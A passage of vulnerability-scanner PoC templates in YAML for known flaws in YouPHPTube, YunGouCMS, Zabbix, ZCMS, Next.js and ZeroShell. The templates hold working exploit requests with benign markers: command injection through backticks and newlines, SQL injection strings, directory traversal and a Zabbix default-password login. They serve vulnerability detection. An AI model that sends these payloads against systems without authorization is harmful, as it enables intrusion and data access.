7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | 11 | detail: 12 | author: kzaopa(https://github.com/kzaopa) 13 | links: 14 | - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/youphptube-encoder-cve-2019-5127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5127 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getImage.php?base64Url={{payload}}&format=png 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/youphptube-encoder-cve-2019-5128.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5128 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getImageMP4.php?base64Url={{payload}}&format=jpg 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/youphptube-encoder-cve-2019-5129.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5129 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | links: 14 | - https://www.secquan.org/Prime/1069179 -------------------------------------------------------------------------------- /src/plugins/pocs/zabbix-authentication-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-authentication-bypass 2 | rules: 3 | - method: GET 4 | path: /zabbix.php?action=dashboard.view&dashboardid=1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.exploit-db.com/exploits/47467 -------------------------------------------------------------------------------- /src/plugins/pocs/zabbix-cve-2016-10134-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-cve-2016-10134-sqli 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) 11 | detail: 12 | author: sharecast 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 -------------------------------------------------------------------------------- /src/plugins/pocs/zabbix-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-default-password 2 | rules: 3 | - method: POST 4 | path: /index.php 5 | body: name=Admin&password=zabbix&autologin=1&enter=Sign+in 6 | expression: | 7 | response.status == 302 && response.headers["Location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session") 8 | detail: 9 | author: fuzz7j(https://github.com/fuzz7j) 10 | links: 11 | - https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/zcms-v3-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zcms-v3-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e") 9 | detail: 10 | author: MaxSecurity(https://github.com/MaxSecurity) 11 | links: 12 | - https://www.anquanke.com/post/id/183241 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/zeit-nodejs-cve-2020-5284-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /_next/static/../server/pages-manifest.json 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body) 7 | detail: 8 | author: x1n9Qi8 9 | links: 10 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284 -------------------------------------------------------------------------------- /src/plugins/pocs/zeroshell-cve-2019-12725-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeroshell-cve-2019-12725-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 11 | 12 | detail: 13 | author: YekkoY 14 | description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725" 15 | links: 16 | - http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.md?btwaf=51546333 17 | --------------------------------------------------------------------------------